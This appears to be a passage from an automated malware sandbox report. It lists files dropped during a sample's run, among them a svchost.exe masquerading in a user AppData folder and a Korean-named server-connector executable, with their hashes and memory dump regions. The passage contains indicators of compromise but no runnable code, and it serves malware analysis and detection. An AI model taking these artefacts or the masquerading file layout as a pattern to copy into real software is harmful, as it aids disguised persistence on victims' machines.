5f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b98ebbdec80f428df5f0852baccf6b6c

SHA1
d4350a6013e0a6a16a226924d793137856ad3778

SHA256
eb48ecf0a70548a07441cad51f8934816a64142febff9c4d8b4057594ee614ef

SHA512
5cc20e4af79ae449cc524e66e3da5a017d0cff8a0798db2918b6c8fcd394f0a6d622de5d669c5033c541573a066a3c7776ddd065b8a1b14a024e102bffa5498c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
59583cecd69c4401d92a7a17a16f194b

SHA1
6134e6c5ec66c755f1537dd984c66b293a207a46

SHA256
b3804330d219ae8b7ab3c7b36329b611f8e2c69e90fc86d77760b18d8428f6a6

SHA512
084a905d9543be8af45126ff5bd40db819f7cddee9db7618eb42c1229145b944ebd8c61696ac7ec617bd0e55152931bf964b6af01018e9bfce964b4e16121e32

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ppkki3tt.joc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\_가이아서버 접속기.exe

Filesize
2.7MB

MD5
c5fc53d3969bea56dc506c473b805c13

SHA1
7c59712142fe98d48ca6276851ee890585c9772a

SHA256
21956ec4108a00fc6aae28ffa52ebb3dd76a1d9d1adac9648df2a6354646052c

SHA512
79d45c966c534831b26e71b48f0a0690a8a61e4d47998deb1b2e35fb50a26fdea072db34805c7e1db35f105e3bd062f05094b102d5d6290bfa20c0847485856b

Download Submit
C:\Users\Admin\AppData\local\svchost\svchost.db

Filesize
131KB

MD5
c3cab7bced85269a21d79d2c5cb809c7

SHA1
4062b25a4d082955a095f58137ea026868fa50cc

SHA256
a68eca06f40f48cf91c5ba72e650522d734b2afed9a0c7e20631d3b9a4740e3e

SHA512
5e886f6daa671d459c3904a384c47db26186c209e8480c143c59ae2205ecbc24f808c0579adee39b43e7dc33cec56e70b397bb92d5c11f72fb71fabadb283b44

Download Submit
C:\Users\Admin\AppData\local\svchost\svchost.exe

Filesize
1.6MB

MD5
400b9faa5f261a5a0d194e633483571c

SHA1
b5bf2b5692d6e2eb800406d77a5f1de6a852ede8

SHA256
1dbe9d36ce4a1dfb469fb20c1b2b8964e5e08a96f3cf46ba6bdfc27247d97b65

SHA512
3cce6f30a3c2c2b09d13292d0de3fc0809f3617874e642b914ec9ee3982a915d20bfd25b9db40e3dc63b390ffcb9ef57654b9d82760b4a2ab3f4cc76914164d5

Download Submit
C:\Users\Admin\AppData\local\svchost\svchost.msh

Filesize
22KB

MD5
90f91efb0b6cc632ea6b2bb3a6d5fb40

SHA1
e46a39e7252e086f34d64c3d720442cd325de506

SHA256
7db6fa16d92fa026ba88337e51623caea566a78eb275af77905286a533792fc9

SHA512
f511124b19a4f05e09f253f5f63e991694565247f9c09430368f53d5466ecb8822811107c7c0a9e91e8d1b0ff85bfa37a243b0635eb893c8fae39ea8152c3928

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\03B3EE43C2EBAC4D4565628A73CBD5E73DC705E8

Filesize
1KB

MD5
2fb0e40346aa548624dacf5a3f5292c1

SHA1
1c41ff6c104e8d6ae51a97494b6e8632a480e181

SHA256
c7789042a5177b5b654cf082ee3821c9511235941825e735582a959540dbfe95

SHA512
da9f25306866ee415b21ef72d72cfd4e6897f7e54f1a05cf27124504d2d7269a3f6d143c06682778df5032f60b4b1451bebc7f001cfc15f975559d8d55835cbf

Download Submit
memory/804-87-0x00007FF619410000-0x00007FF619794000-memory.dmp

Filesize
3.5MB

Download
memory/804-83-0x00007FF619410000-0x00007FF619794000-memory.dmp

Filesize
3.5MB

Download
memory/952-116-0x00007FF619410000-0x00007FF619794000-memory.dmp

Filesize
3.5MB

Download
memory/2908-29-0x0000000000C80000-0x0000000000F3C000-memory.dmp

Filesize
2.7MB

Download
memory/3356-140-0x00007FF619410000-0x00007FF619794000-memory.dmp

Filesize
3.5MB

Download
memory/3356-141-0x00007FF619410000-0x00007FF619794000-memory.dmp

Filesize
3.5MB

Download
memory/4292-17-0x00007FF9CF900000-0x00007FF9D03C1000-memory.dmp

Filesize
10.8MB

Download
memory/4292-82-0x00007FF9CF900000-0x00007FF9D03C1000-memory.dmp

Filesize
10.8MB

Download
memory/4292-55-0x00007FF9CF900000-0x00007FF9D03C1000-memory.dmp

Filesize
10.8MB

Download
memory/4292-54-0x00007FF9CF903000-0x00007FF9CF905000-memory.dmp

Filesize
8KB

Download
memory/4292-2-0x00007FF9CF903000-0x00007FF9CF905000-memory.dmp

Filesize
8KB

Download
memory/4292-90-0x00007FF9CF900000-0x00007FF9D03C1000-memory.dmp

Filesize
10.8MB

Download
memory/4292-16-0x0000024FEBAF0000-0x0000024FEBB66000-memory.dmp

Filesize
472KB

Download
memory/4292-15-0x0000024FEBA20000-0x0000024FEBA64000-memory.dmp

Filesize
272KB

Download
memory/4292-14-0x00007FF9CF900000-0x00007FF9D03C1000-memory.dmp

Filesize
10.8MB

Download
memory/4292-12-0x0000024FEB620000-0x0000024FEB642000-memory.dmp

Filesize
136KB

Download
memory/4292-13-0x00007FF9CF900000-0x00007FF9D03C1000-memory.dmp

Filesize
10.8MB

Download